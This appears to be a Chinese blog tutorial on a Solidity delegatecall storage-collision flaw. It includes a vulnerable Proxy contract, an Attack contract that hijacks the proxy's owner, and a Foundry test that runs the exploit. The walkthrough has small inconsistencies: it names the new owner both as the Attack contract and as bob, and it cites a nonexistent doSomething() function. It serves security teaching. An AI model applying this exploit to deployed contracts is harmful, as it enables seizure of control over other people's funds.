Solidity&Foundry 安全审计测试 Delegatecall漏洞2

名称:

Delegatecall漏洞2

https://github.com/XuHugo/solidityproject/tree/master/vulnerable-defi

描述:

我们已经了解了delegatecall 一个基础的漏洞------所有者操纵漏洞,这里就不再重复之前的基础知识了,不了解或者遗忘的可以再看看上一篇文章;这篇文章的目的是加深一下大家对 delegatecall 的印象并带大家一起去玩点刺激的,拿下一个进阶版的漏洞合约。

这次的攻击目标依然是获得 Proxy 合约中的 owner 权限,我们可以看到两个合约中除了 Proxy合约中的构造函数可以修改合约的 owner 其他地方并没有修改 owner 的函数。我们要如何完成攻击呢?这里需要一点小技巧,大家可以思考一下。

过程:

1、alice分别部署 Delegate、Attack和Proxy合约;

2、攻击者 bob调用 Attack的attack函数,成功将 Proxy合约中的 owner 改成attack的地址。

分析:

Attack.attack() 函数先将自己的地址转换为 uint256 类型。

然后调用 Proxy.pwn() 函数,相当于调用Delegate.pwn()函数,pwn()函数会根据入参修改变量num(slot 0),由于是delegatecall,所以Proxy合约也是修改slot 0------变量delegate,那么attack函数的参数就会写入Proxy的slot0了,这样我们就相当于把delegate地址改为了Attack合约地址;

然后我们再次调用Proxy.pwn() 函数,现在相当于是调用Attack.pwn()函数,此时我们再来观察 Attack 合约的写法,发现其变量的存储位置故意和 Proxy合约保持一致,并且不难发现 Attack.pwn() 函数的内容也被攻击者写为 owner = msg.sender,这个操作修改了合约中存储位置为 slot1 的变量。所以 Proxy合约使用 delegatecall 调用 Attack.doSomething() 函数就会将合约中存储位置为 slot1 的变量 owner 修改为 msg.sender 也就是 bob的地址,至此攻击者完成了他的攻击。

解决方法:

在使用 delegatecall 时应注意被调用合约的地址不能是可控的;

在较为复杂的合约环境下需要注意变量的声明顺序以及存储位置。因为使用 delegatecall 进行外部调时会根据被调用合约的数据结构来用修改本合约相应 slot 中存储的数据,在数据结构发生变化时这可能会造成非预期的变量覆盖。

proxy合约:

javascript 复制代码
contract Proxy {
    Delegate delegate;
    address public owner;
    uint public num;

    constructor(address _delegateAddress) public {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    fallback() external {
        (bool suc, ) = address(delegate).delegatecall(msg.data); // vulnerable
        require(suc, "Delegatecall failed");
    }
}

Attack 代码:

javascript 复制代码
contract Attack {
    Delegate delegate;
    address public owner;
    uint public num;

    Proxy public proxy;

    constructor(address _proxy) public {
        proxy = Proxy(_proxy);
    }

    function attack() external {
        address(proxy).call(
            abi.encodeWithSignature(
                "pwn(uint256)",
                uint(uint160(address(this)))
            )
        );
        //address(proxy).call(abi.encodeWithSignature("pwn(uint256)", 1));
    }

    function pwn(uint _num) public {
        owner = msg.sender;
    }
}

foundry测试代码:

javascript 复制代码
contract ContractTest is Test {
    Proxy proxy;
    Delegate DelegateContract;
    Attack attack;
    address alice;
    address bob;

    function setUp() public {
        alice = vm.addr(1);
        bob = vm.addr(2);
    }

    function testDelegatecall() public {
        DelegateContract = new Delegate(); // logic contract
        vm.prank(alice);
        proxy = new Proxy(address(DelegateContract)); // proxy contract
        attack = new Attack(address(proxy)); // attack contract

        console.log("Alice address", alice);
        console.log("Proxy owner", proxy.owner());

        // Delegatecall allows a smart contract to dynamically load code from a different address at runtime.
        console.log("Change DelegationContract owner to bob...");

        attack.attack();
        vm.prank(bob);
        address(proxy).call(abi.encodeWithSignature("pwn(uint256)", 1));

        console.log("Proxy owner", proxy.owner());
        console.log(
            "Exploit completed, proxy contract storage has been manipulated"
        );
    }
}
相关推荐
猫耳君4 小时前
汽车网络安全 CyberSecurity ISO/SAE 21434 测试之四
安全·web安全·网络安全·汽车·测试·security·cybersecurity
余防7 小时前
XXE - 实体注入(xml外部实体注入)
xml·前端·安全·web安全·html
粟悟饭&龟波功12 小时前
【网络安全】二、入门篇:HTTP 协议进阶 ——GET/POST 常用传参方法详解
安全·web安全·http
AORO202512 小时前
三防手机是什么?有哪些值得购入的三防手机?
网络·5g·安全·智能手机·信息与通信
thginWalker13 小时前
安全系统架构
安全·系统架构
lingggggaaaa13 小时前
小迪安全v2023学习笔记(九十讲)—— 小程序篇&反编译&外在&主包分包&配置泄露&算法逆向&未授权
笔记·学习·安全·web安全·网络安全·小程序
独行soc16 小时前
2025年渗透测试面试题总结-90(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
纠结的学渣16 小时前
信息安全基础知识:03密码学基础知识
安全
缘的猿16 小时前
Kubernetes 安全管理:认证、授权与准入控制全面解析
java·安全·kubernetes
乾博电子17 小时前
GFM100 地线连续性检测监控器:破解工业接地痛点,筑牢电力系统安全防线
安全·系统安全·在线监测·在线绝缘监测仪·地线连续性绝缘监测